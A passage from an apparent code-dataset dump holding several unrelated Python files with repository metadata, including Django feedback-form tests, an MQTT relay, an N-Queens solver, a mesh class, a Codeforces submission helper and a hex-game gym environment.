'mentor_response_time': models.InitialMentorFeedback.HOURS_12,\n 'payment_approved': True,\n 'full_time_effort': True,\n 'progress_report': 'Everything is fine.',\n 'mentors_report': 'I am very supportive',\n 'request_extension': False,\n 'extension_date': None,\n 'request_termination': False,\n 'termination_reason': '',\n }\n defaults.update(kwargs)\n return defaults\n\n def _submit_mentor_feedback_form(self, internselection, stage, answers):\n mentor = internselection.mentors.get()\n self.client.force_login(mentor.mentor.account)\n\n path = reverse(stage + '-mentor-feedback', kwargs={\n 'username': internselection.applicant.applicant.account.username,\n })\n\n return self.client.post(path, {\n # This is a dictionary comprehension that converts model-level\n # values to form/POST values. It assumes all form widgets accept\n # the str() representation of their type when the form is POSTed.\n # Values which are supposed to be unspecified can be provided as\n # None, in which case we don't POST that key at all.\n key: str(value)\n for key, value in answers.items()\n if value is not None\n })\n\n def test_mentor_can_give_initial_feedback(self):\n current_round = RoundPageFactory(start_from='initialfeedback')\n for request_extension in (False, True):\n with self.subTest(request_extension=request_extension):\n internselection = InternSelectionFactory(\n active=True,\n round=current_round,\n )\n\n extension_date = None\n if request_extension:\n extension_date = internselection.round().initialfeedback + datetime.timedelta(weeks=5)\n\n answers = self._mentor_feedback_form(internselection,\n request_extension=request_extension,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.initialmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n def test_invalid_duplicate_mentor_feedback(self):\n current_round = RoundPageFactory(start_from='initialfeedback')\n week = datetime.timedelta(weeks=1)\n disallowed_when = (\n {'allow_edits': False, 'intern_selection__initial_feedback_opens': current_round.initialfeedback - week},\n {'allow_edits': True, 'intern_selection__initial_feedback_opens': current_round.initialfeedback + week},\n )\n for params in disallowed_when:\n with self.subTest(params=params):\n prior = InitialMentorFeedbackFactory(intern_selection__round=current_round, **params)\n internselection = prior.intern_selection\n\n answers = self._mentor_feedback_form(internselection)\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n\n # permission denied\n self.assertEqual(response.status_code, 403)\n\n def test_mentor_can_resubmit_feedback(self):\n prior = InitialMentorFeedbackFactory(allow_edits=True)\n internselection = prior.intern_selection\n\n answers = self._mentor_feedback_form(internselection)\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 302)\n\n # discard all cached objects and reload from database\n internselection = models.InternSelection.objects.get(pk=internselection.pk)\n\n # will raise DoesNotExist if the view destroyed this feedback\n feedback = internselection.initialmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n # we didn't create a version for the factory-generated object, so the\n # only version should be the one that the view records\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n def test_invalid_mentor_extension_request(self):\n round = RoundPageFactory(start_from='initialfeedback')\n\n range_error = \"Extension date must be between {} and {}\".format(\n round.initialfeedback,\n round.initialfeedback + datetime.timedelta(weeks=5),\n )\n extension_deltas = (\n (None, \"If you're requesting an extension, this field is required.\"),\n (datetime.timedelta(days=-1), range_error),\n (datetime.timedelta(weeks=5, days=1), range_error),\n )\n for extension_delta, expected_error in extension_deltas:\n with self.subTest(extension_delta=extension_delta):\n internselection = InternSelectionFactory(\n active=True,\n round=round,\n )\n\n extension_date = None\n if extension_delta:\n extension_date = round.initialfeedback + extension_delta\n\n answers = self._mentor_feedback_form(internselection,\n request_extension=True,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 200)\n\n # view should not have created a feedback object\n with self.assertRaises(models.InitialMentorFeedback.DoesNotExist):\n internselection.initialmentorfeedback\n\n self.assertFormError(response, \"form\", \"extension_date\", expected_error)\n\n @staticmethod\n def _intern_feedback_form(internselection, **kwargs):\n defaults = {\n 'in_contact': True,\n 'asking_questions': True,\n 'active_in_public': True,\n 'provided_onboarding': True,\n 'checkin_frequency': models.InitialInternFeedback.ONCE_WEEKLY,\n 'last_contact': internselection.initial_feedback_opens,\n 'intern_response_time': models.InitialInternFeedback.HOURS_12,\n 'mentor_response_time': models.InitialInternFeedback.HOURS_12,\n 'mentor_support': 'My mentor is awesome.',\n 'hours_worked': models.InitialInternFeedback.HOURS_40,\n 'time_comments': '',\n 'progress_report': 'Everything is fine.',\n 'share_mentor_feedback_with_community_coordinator': True,\n }\n defaults.update(kwargs)\n return defaults\n\n def _submit_intern_feedback_form(self, internselection, stage, answers):\n self.client.force_login(internselection.applicant.applicant.account)\n\n return self.client.post(reverse(stage + '-intern-feedback'), {\n # This is a dictionary comprehension that converts model-level\n # values to form/POST values. It assumes all form widgets accept\n # the str() representation of their type when the form is POSTed.\n # Values which are supposed to be unspecified can be provided as\n # None, in which case we don't POST that key at all.\n key: str(value)\n for key, value in answers.items()\n if value is not None\n })\n\n def test_intern_can_give_initial_feedback(self):\n internselection = InternSelectionFactory(\n active=True,\n round__start_from='initialfeedback',\n )\n\n answers = self._intern_feedback_form(internselection)\n response = self._submit_intern_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.initialinternfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n @staticmethod\n def _midpoint_mentor_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.MidpointMentorFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.MidpointMentorFeedback.HOURS_6,\n 'intern_contribution_frequency': models.MidpointMentorFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.MidpointMentorFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.MidpointMentorFeedback.DAYS_2,\n 'last_contact': internselection.midpoint_feedback_opens,\n 'payment_approved': True,\n 'full_time_effort': True,\n 'progress_report': 'Everything is fine.',\n 'mentors_report': 'I am very supportive',\n 'request_extension': False,\n 'extension_date': None,\n 'request_termination': False,\n 'termination_reason': '',\n }\n defaults.update(kwargs)\n return defaults\n\n def test_mentor_can_give_midpoint_feedback(self):\n current_round = RoundPageFactory(start_from='midfeedback')\n for request_extension in (False, True):\n with self.subTest(request_extension=request_extension):\n internselection = InternSelectionFactory(\n active=True,\n round=current_round,\n )\n\n extension_date = None\n if request_extension:\n extension_date = internselection.round().midfeedback + datetime.timedelta(weeks=5)\n\n answers = self._midpoint_mentor_feedback_form(internselection,\n request_extension=request_extension,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'midpoint', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.midpointmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n def test_invalid_duplicate_midpoint_mentor_feedback(self):\n # The dates of the round don't matter because the views check the dates in the InternSelection\n current_round = RoundPageFactory(start_from='midfeedback')\n week = datetime.timedelta(weeks=1)\n disallowed_when = (\n {'allow_edits': False, 'intern_selection__midpoint_feedback_opens': current_round.midfeedback - week},\n {'allow_edits': True, 'intern_selection__midpoint_feedback_opens': current_round.midfeedback + week},\n )\n for params in disallowed_when:\n with self.subTest(params=params):\n prior = MidpointMentorFeedbackFactory(intern_selection__round=current_round, **params)\n internselection = prior.intern_selection\n\n answers = self._midpoint_mentor_feedback_form(internselection)\n response = self._submit_mentor_feedback_form(internselection, 'midpoint', answers)\n\n # permission denied\n self.assertEqual(response.status_code, 403)\n\n @staticmethod\n def _midpoint_intern_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.MidpointInternFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.MidpointInternFeedback.HOURS_6,\n 'intern_contribution_frequency': models.MidpointInternFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.MidpointInternFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.MidpointInternFeedback.DAYS_2,\n 'last_contact': internselection.initial_feedback_opens,\n 'mentor_support': 'My mentor is awesome.',\n 'hours_worked': models.InitialInternFeedback.HOURS_40,\n 'time_comments': '',\n 'progress_report': 'Everything is fine.',\n 'share_mentor_feedback_with_community_coordinator': True,\n }\n defaults.update(kwargs)\n return defaults\n\n def test_intern_can_give_midpoint_feedback(self):\n internselection = InternSelectionFactory(\n active=True,\n round__start_from='midfeedback',\n )\n\n answers = self._midpoint_intern_feedback_form(internselection)\n response = self._submit_intern_feedback_form(internselection, 'midpoint', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.midpointinternfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n @staticmethod\n def _final_intern_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.FinalInternFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.FinalInternFeedback.HOURS_6,\n 'intern_contribution_frequency': models.FinalInternFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.FinalInternFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.FinalInternFeedback.DAYS_2,\n 'last_contact': internselection.final_feedback_opens,\n 'mentor_support': 'My mentor is awesome.',\n 'hours_worked': models.FinalInternFeedback.HOURS_40,\n 'time_comments': '',\n 'progress_report': 'Everything is fine.',\n 'share_mentor_feedback_with_community_coordinator': True,\n 'interning_recommended': models.FinalInternFeedback.YES,\n 'recommend_intern_chat': models.FinalInternFeedback.NO_OPINION,\n 'chat_frequency': models.FinalInternFeedback.WEEK2,\n 'blog_frequency': models.FinalInternFeedback.WEEK3,\n 'blog_prompts_caused_writing': models.FinalInternFeedback.YES,\n 'blog_prompts_caused_overhead': models.FinalInternFeedback.YES,\n 'recommend_blog_prompts': models.FinalInternFeedback.YES,\n 'zulip_caused_intern_discussion': models.FinalInternFeedback.YES,\n 'zulip_caused_mentor_discussion': models.FinalInternFeedback.NO,\n 'recommend_zulip': models.FinalInternFeedback.YES,\n 'tech_industry_prep': models.FinalInternFeedback.NO,\n 'foss_confidence': models.FinalInternFeedback.YES,\n 'feedback_for_organizers': 'This was a really awesome internship!',\n }\n defaults.update(kwargs)\n return defaults\n\n def test_intern_can_give_final_feedback(self):\n internselection = InternSelectionFactory(\n active=True,\n round__start_from='finalfeedback',\n )\n\n answers = self._final_intern_feedback_form(internselection)\n response = self._submit_intern_feedback_form(internselection, 'final', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.finalinternfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n @staticmethod\n def _final_mentor_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.FinalMentorFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.FinalMentorFeedback.HOURS_6,\n 'intern_contribution_frequency': models.FinalMentorFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.FinalMentorFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.FinalMentorFeedback.DAYS_2,\n 'last_contact': internselection.final_feedback_opens,\n 'payment_approved': True,\n 'full_time_effort': True,\n 'progress_report': 'Everything is fine.',\n 'mentors_report': 'I am very supportive',\n 'request_extension': False,\n 'extension_date': None,\n 'request_termination': False,\n 'termination_reason': '',\n 'mentoring_recommended': models.FinalMentorFeedback.NO_OPINION,\n 'blog_frequency': models.FinalMentorFeedback.NO_OPINION,\n 'blog_prompts_caused_writing': models.FinalMentorFeedback.NO_OPINION,\n 'blog_prompts_caused_overhead': models.FinalMentorFeedback.NO_OPINION,\n 'recommend_blog_prompts': models.FinalMentorFeedback.NO_OPINION,\n 'zulip_caused_intern_discussion': models.FinalMentorFeedback.NO_OPINION,\n 'zulip_caused_mentor_discussion': models.FinalMentorFeedback.NO_OPINION,\n 'recommend_zulip': models.FinalMentorFeedback.NO_OPINION,\n 'feedback_for_organizers': 'There are things you could improve but they are minor',\n }\n defaults.update(kwargs)\n return defaults\n\n def test_mentor_can_give_final_feedback(self):\n current_round = RoundPageFactory(start_from='finalfeedback')\n for request_extension in (False, True):\n with self.subTest(request_extension=request_extension):\n internselection = InternSelectionFactory(\n active=True,\n round=current_round,\n )\n\n extension_date = None\n if request_extension:\n extension_date = internselection.round().midfeedback + datetime.timedelta(weeks=5)\n\n answers = self._final_mentor_feedback_form(internselection,\n request_extension=request_extension,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'final', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.finalmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n","repo_name":"sidhu08/website-1","sub_path":"home/test_internselection.py","file_name":"test_internselection.py","file_ext":"py","file_size_in_byte":28483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32137812649","text":"import sys\n\nimport rocker\nfrom rocker.core import list_plugins\nfrom rocker.core import pull_image\nfrom rocker.core import DockerImageGenerator\n\n\ndef mcmillan():\n print(\"Launching McMillan Airfield\")\n run_drone_demo('roslaunch sitl_launcher demo.launch gui:=false sitl_world:=mcmillan')\n\ndef yosemite():\n print(\"Launching Yosemite Valley\")\n run_drone_demo('roslaunch sitl_launcher demo.launch gui:=false sitl_world:=yosemite')\n\n\ndef run_drone_demo(command):\n plugins = list_plugins()\n base_image = 'tfoote/drone_demo'\n desired_plugins = ['nvidia', 'pulse', 'user', 'home', 'x11']\n active_extensions = [e() for e in plugins.values() if e.get_name() in desired_plugins]\n pull_image(base_image)\n dig = DockerImageGenerator(active_extensions, {}, base_image)\n if dig.build() != 0:\n print (\"Failed to build\")\n sys.exit(1)\n if dig.run(command) != 0:\n print (\"Failed to run\")\n sys.exit(1)\n","repo_name":"osrf/px4sitl","sub_path":"src/px4sitl/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16453689642","text":"def set_queens(idx): # 현재 내가 주목하고 있는 행\n global answer\n\n if idx == N: # N queen 배치가 끝났다\n answer += 1\n return\n\n for i in range(N): # 퀸을 배치할 수 있는 후보 열\n is_able = True\n\n for j in range(idx): # 나 이전에 놓여진 퀸의 위치 확인\n if i == queens[j] or abs(idx-j) == abs(i-queens[j]): # 열이 겹치거나 대각선으로 겹치면\n is_able = False\n break\n\n if is_able:\n queens[idx] = i # i 열에 퀸을 배치한다\n set_queens(idx+1) # 다음 퀸을 배치하러 간다\n queens[idx] = -1\n\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n queens = [-1]*N # 인덱스 = 행, 값 = 열 (한 행에 한 개의 queen 을 놓을 수 있다)\n answer = 0\n set_queens(0) # 0번째 행에 퀸을 놓는 것으로 시작\n\n print('#{} {}'.format(tc, answer))","repo_name":"charlie-jyj/APS","sub_path":"algorithm_practice/0420/SWEA_2806_NQueen_정유진.py","file_name":"SWEA_2806_NQueen_정유진.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"558043859","text":"#!/usr/bin/python3\nimport socket\nimport sys\nimport signal\n\nimport paho.mqtt.client as mqtt\n\n#mqtt stuff\n#state topics: are just the dictonary names \nbroker_address = \"localhost\"\nmqtt_state_prefix = \"ard_state/\"\nclient = mqtt.Client(\"P25\")\n\ndef on_message(client, userdata, message):\n print(message.topic, \" \", str(message.payload.decode(\"utf-8\")))\n topic = message.topic.split(\"/\")\n print(topic)\n if topic[0]==\"ard_command\":\n echo = \"!c!\" + topic[1] + \"!\" + str(message.payload.decode(\"utf-8\")) + \"$\\n\"\n print(\">>>\" + echo)\n sock.send(echo.encode());\n \ndef publish_mqtt(key, payload):\n client.publish(mqtt_state_prefix + key, payload)\n \n \n\n \n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect the socket to the port where the server is listening\nserver_address = ('raspberrypi.fritz.box', 8888)\nprint ('connecting to %s port %s' % server_address)\nsock.connect(server_address)\n\n\n#message = 'This is the message. It will be repeated.'\n#print( 'sending \"%s\"' % message)\n#sock.sendall(message)\n\ndef signal_handler(sig, frame):\n sock.close()\n \n print('Exit...')\n sys.exit(0)\n \nif __name__ == \"__main__\":\n\n #mqtt\n client.on_message=on_message\n client.connect(broker_address)\n client.loop_start() \n client.subscribe([(\"ard_state/#\",1), (\"ard_command/#\",1)])\n\n #gracefull strg+c\n signal.signal(signal.SIGINT, signal_handler)\n\n amount_received = 0\n\n message_complete=0\n message=''\n\n while 1:\n if not(message_complete):\n char = sock.recv(1)\n #print(char)\n if char==b'$':\n message_complete=1\n else:\n if char==b'\\n':\n message=''\n else:\n message += char.decode('UTF-8') \n else:\n print(message)\n message_complete=0\n sub_message = message.split(\"!\")\n if len(sub_message)>=4:\n if sub_message[1]==\"s\":\n publish_mqtt(sub_message[2], sub_message[3])\n \n #print(sub_message)\n \n\n\n sock.close()\n","repo_name":"e33b1711/power_raspi","sub_path":"mqtt_relay.py","file_name":"mqtt_relay.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6065630492","text":"import itertools\n\nimport numpy as np\nfrom SSplines.helper_functions import barycentric_coordinates\n\n\nclass Mesh(object):\n \"\"\"\n Given a set of vertices and a connectivity matrix describing each triangle,\n represents the corresponding mesh.\n \"\"\"\n\n def __init__(self, vertices, connectivity_matrix):\n \"\"\"\n Initialize a mesh with connectivity matrix and vertices.\n :param np.ndarray vertices: vertex coordinates\n :param np.ndarray connectivity_matrix: vertex indices\n \"\"\"\n\n self.vertices = vertices\n self.triangles = connectivity_matrix\n\n self._generate_data()\n self._compute_h()\n\n def interior_vertices(self):\n return self.int_vertices\n\n def interior_edges(self):\n return self.int_edges\n\n def boundary_vertices(self):\n return self.bnd_vertices\n\n def boundary_edges(self):\n return self.bnd_edges\n\n def get_edge(self, edge_id):\n edge_vertices = self.edge_vertices[edge_id]\n edge_coords = self.vertices[edge_vertices, :]\n\n return edge_coords\n\n def get_vertex(self, vertex_id):\n return self.vertices[vertex_id]\n\n def get_edge_id(self, edge):\n return self.edge_indices[edge]\n\n def get_vertex_id(self, vertex):\n for k in range(len(self.vertices)):\n if vertex == self.vertices[k]:\n return k\n return -1\n\n def incident_triangles(self, vertex_index):\n \"\"\"\n return a list of the triangles that contain vertex v.\n :param vertex_index: vertex number\n :return: list of the triangles\n \"\"\"\n\n triangle_idx = []\n for k in range(len(self.triangles)):\n if vertex_index in self.triangles[k]:\n triangle_idx.append(k)\n return triangle_idx\n\n def adjacent_triangles(self, edge_index):\n \"\"\"\n Return a list of the triangles sharing edge edge_index\n :param edge_index: edge index\n :return: list of triangles sharing edge.\n \"\"\"\n\n edge = self.edge_vertices[edge_index]\n triangle_idx = []\n for k in range(len(self.triangles)):\n if edge[0] in self.triangles[k] and edge[1] in self.triangles[k]:\n triangle_idx.append(k)\n return triangle_idx\n\n def _compute_h(self):\n \"\"\"\n Computes the max, min and average triangle side-length in the mesh.\n \"\"\"\n\n edge_lengths = np.zeros(len(self.edges))\n\n for e in self.edges:\n i, j = self.edge_vertices[e]\n v1, v2 = self.vertices[[i, j], :]\n edge_lengths[e] = np.sqrt((v2[0] - v1[0]) ** 2 + (v2[1] - v1[1]) ** 2)\n\n self.h_max = max(edge_lengths)\n self.h_min = min(edge_lengths)\n self.h_avg = np.average(edge_lengths)\n\n def _generate_data(self):\n\n # unique edges in the mesh\n self.edge_vertices = np.array(list(set(tuple(sorted(edge))\n for triangle in self.triangles\n for edge in itertools.combinations(triangle, 2))))\n\n # edge to edge_index map - edges with reverse orientation map to same index\n self.edge_indices = {tuple(edge): i\n for i, edge_ in enumerate(self.edge_vertices)\n for edge in (edge_, reversed(edge_))}\n\n # list of boundary edges\n self.bnd_edges = sorted([self.edge_indices[tuple(edge)] for edge in self.edge_vertices\n if len(self.adjacent_triangles(self.edge_indices[tuple(edge)])) == 1])\n\n # list of boundary vertices\n self.bnd_vertices = sorted(list(set([vertex\n for edge in self.bnd_edges\n for vertex in self.edge_vertices[edge]])))\n\n self.int_edges = [self.edge_indices[tuple(edge)] for edge in self.edge_vertices\n if self.edge_indices[tuple(edge)] not in self.bnd_edges]\n\n self.int_vertices = [vertex_id for vertex_id in range(len(self.vertices)) if vertex_id not in self.bnd_vertices]\n\n self.edges = self.bnd_edges + self.int_edges\n\n def find_triangle(self, x):\n \"\"\"\n Given a point x in the domain of the triangulation, determine for which index i\n the point x lies in triangle i.\n :param np.ndarray x: point of interest\n :return: index i such that x lies in T_i\n \"\"\"\n\n for k, T in enumerate(self.triangles):\n vertices = self.vertices[T]\n b = barycentric_coordinates(triangle=vertices, x=x)\n\n if np.all(b >= 0):\n return k\n else:\n continue\n\n return k\n","repo_name":"qTipTip/PSFEM","sub_path":"PSFEM/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5541645482","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nt_0 = 0 # define model parameters\nt_end = 4\nlength = 1000\ntheta = 1.1\nmu = 0.8\nsigma = 0.3\nt = np.linspace(t_0,t_end,length) # define time axis\ndt = np.mean(np.diff(t))\ny = np.zeros(length)\ny0 = np.random.normal(loc=0.0,scale=1.0) # initial condition\ndrift = lambda y,t: theta*(mu-y) # define drift term, google to learn about lambda\ndiffusion = lambda y,t: sigma # define diffusion term\nnoise = np.random.normal(loc=0.0,scale=1.0,size=length)*np.sqrt(dt) #define noise process\n# solve SDE\nfor i in range(1,length):\n y[i] = y[i-1] + drift(y[i-1],i*dt)*dt + diffusion(y[i-1],i*dt)*noise[i]\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\n\"\"\"\nanimation example 2\nauthor: Kiterun\n\"\"\"\n\nfig, ax = plt.subplots()\nx = np.linspace(0, 2*np.pi, 200)\ny = np.sin(x)\nl = ax.plot(x, y)\ndot, = ax.plot([], [], 'ro')\n\ndef init():\n ax.set_xlim(0, 2*np.pi)\n ax.set_ylim(-1, 1)\n return l\n\ndef gen_dot():\n for i in np.linspace(0, 2*np.pi, 200):\n newdot = [i, np.sin(i)]\n yield newdot\n\ndef update_dot(newd):\n dot.set_data(newd[0], newd[1])\n return dot,\n\nani = animation.FuncAnimation(fig, update_dot, frames = gen_dot, interval = 100, init_func=init)\nani.save('sin_dot.gif', writer='imagemagick', fps=30)\nplt.show()\n","repo_name":"newworldszd/price","sub_path":"venv/venv/ornstein.py","file_name":"ornstein.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71875679772","text":"import datetime\nimport submissionListener\nfrom bs4 import BeautifulSoup\nfrom tkinter import messagebox\nimport threading\ndef submutSolution(link, session, problem, filepath):\n if not filepath:messagebox.showerror(title=\"Error\",message=\"Please Choose a File\");return\n bol = messagebox.askyesno(title=\"Confirmation\", message=\"Are you sure that you want to submit this solution?\")\n if not bol:return\n problem_id = problem\n if filepath[-1] == \"y\":\n programming_language = 'Python'\n elif filepath[-1] == \"p\":\n programming_language = 'C++'\n elif filepath[-1] == \"a\":\n programming_language = 'Java'\n\n submission_page = session.get(f\"{link}/submit\").content\n soup = BeautifulSoup(submission_page, 'html.parser')\n form_data = {}\n for field in ['csrf_token' ]:\n field_value = soup.find('input', {'name': field}).get('value', '')\n form_data[field] = field_value\n form_data['submittedProblemIndex'] = problem_id\n # Read the source code from the file and add it to the form data\n with open(filepath, 'r') as f:\n source_code = f.read()\n form_data['source'] = source_code\n\n # Set the programming language in the form data\n language_map = {\n 'C++': '54',\n 'Java': '36',\n 'Python': '31',\n # Add more languages as necessary\n }\n form_data['programTypeId'] = language_map[programming_language]\n\n # Submit the solution\n response = session.post(f'{link}/submit', data=form_data)\n \n if \"You have submitted exactly the same code before\" in response.text:\n messagebox.showerror(\"Error\",\"You submitted this code before.\")\n return\n # Print the response status code and content\n if response.status_code == 200:\n messagebox.showinfo(title=\"Success!\",message=\"Submited Successfuly\")\n while True:\n try:\n data = session.get(f\"{link}/my\")\n break\n except:\n continue\n\n soup = BeautifulSoup(data.text, 'html.parser')\n submissions = soup.find('table', {'class': 'status-frame-datatable'})\n\n subnum = [td.text.strip() for td in submissions.find_all('tr')[1].find_all('td')][0]\n thread2 = threading.Thread(target = lambda :submissionListener.waitForIt(link,session,subnum))\n thread2.start()\n else:\n messagebox.showerror(title=\"Failure!\",message=\"something went wrong, try again.\")","repo_name":"eng-noorelmobasher/PC-Cubed-System-for-Codeforces","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"5509031830","text":"import numpy as np\nimport hex_helpers as hh\nimport copy\nimport gym\nimport time\nimport copy\nfrom gym import spaces\nfrom minimax_agent import MinimaxAgent\nfrom generic_env_helpers import apply_move, all_moves, is_done, score, AGENT_ID, OPPENENT_ID\nfrom state_generator import generate_state, observation_from_state\n\n#TODO:stop hardcoding the player\n#TODO:generate boards randomly\nboard = [\n [-1, -1, 1, 0, 0, 0, 0, -1, -1],\n [-1, -1, 0, 0, 0, 0, 0, -1, -1],\n [-1, 0, 0, 0, 0, 0, 0, 0, -1],\n [ 1, 0, 0, 0, 0, 0, 0, 0, -1],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, -1],\n [-1, -1,-1, 0, 0, 0, 0, 0, -1],\n [-1, 0,-1, 0, 0, 0, 0, -1, -1],\n [-1, -1, 0, 0, 0, 0, 2, -1, -1]\n]\n\nboard2 = [\n [-1, 1, 0, 2, -1],\n [0, -1, 0, 0, -1],\n [2, 0, 0, 0, 1],\n [0, 0, 0, -1, -1],\n [-1, 1, 0, 2, -1]\n]\n\ndefaultState = {\n 'board': board2,\n 'jumps': [0, 0],\n 'adds': [1, 1],\n 'current_move': 1\n}\n\nWRONG_MOVE_PUNISHMENT = -20\nclass GenericEnv(gym.Env):\n def __init__(self):\n global OPPENENT_ID\n self.metadata = \"useless crap\"\n self.enemyAI = MinimaxAgent(OPPENENT_ID, ply=1)\n self.reset()\n\n \"\"\"\n Resets the state of the environment and returns an initial observation.\n Returns: observation (object): the initial observation of the\n space.\n \"\"\"\n def reset(self):\n # self.state = copy.deepcopy(defaultState)\n self.state = generate_state(size = 5)\n self.update_spaces()\n self.all_moves = all_moves(self.state)\n self.observation = observation_from_state(self.state)\n return self.observation\n\n def step(self, action, debug=0):\n if debug:\n print(self.state)\n move = self.action_to_move(action)\n self.observation, mv_error = apply_move(move, AGENT_ID, self.observation)\n if debug:\n print(self.state)\n #Greedy AI processing\n move = self.enemyAI.select_move(self.observation, debug)\n self.observation, _ = apply_move(move, OPPENENT_ID, self.observation)\n reward = score(AGENT_ID, self.observation)\n done = is_done(self.observation)\n if(mv_error == True):\n done = True\n reward = WRONG_MOVE_PUNISHMENT\n if debug:\n print(done)\n # self.action_space = moves(1, self.state) - THIS SHOULD BE STATIC I BELIEVE\n return self.observation, reward, done, 0\n\n \"\"\"\n We dont use this crap\n \"\"\"\n def render(self, mode='human', close=False):\n return\n\n # \"PRIVATE\" methods\n\n \"\"\"\n Not confusing naming at all\n \"\"\"\n def action_to_move(self, action):\n move = self.all_moves[action]\n return move\n\n def update_spaces(self):\n height = len(self.state['board'])\n width = len(self.state['board'][0])\n # self.action_space = moves(1, state) THIS SHOULD BE FIXED-SIZE SOMEHOW - ALL POSSIBLE/IMPOSSIBLE MOVEs\n # The RL agent cant use our `moves` because it can work only with\n # static action_space shape and static observation_space shape\n # Long array of all possible moves for this board (including illegal) - (see `all_moves` func).\n moves_count = len(all_moves(self.state))\n # print('Move count: ', moves_count)\n self.action_space = spaces.Discrete(moves_count) # number of actions from 0 to all_moves.size\n # board value range from -(1 to 2) = (0 to 3) = 3\n # but adds from 0 to 1\n # and jump 0 to Inf\n # so let it be 5. Also see `observation_from_state`\n self.observation_space = spaces.Box(low=-1.0, high=10.0, shape=(1,height * height + 5), dtype=np.int8) # spaces.Discrete(5)\n self.reward_range = [WRONG_MOVE_PUNISHMENT, -WRONG_MOVE_PUNISHMENT] #score is 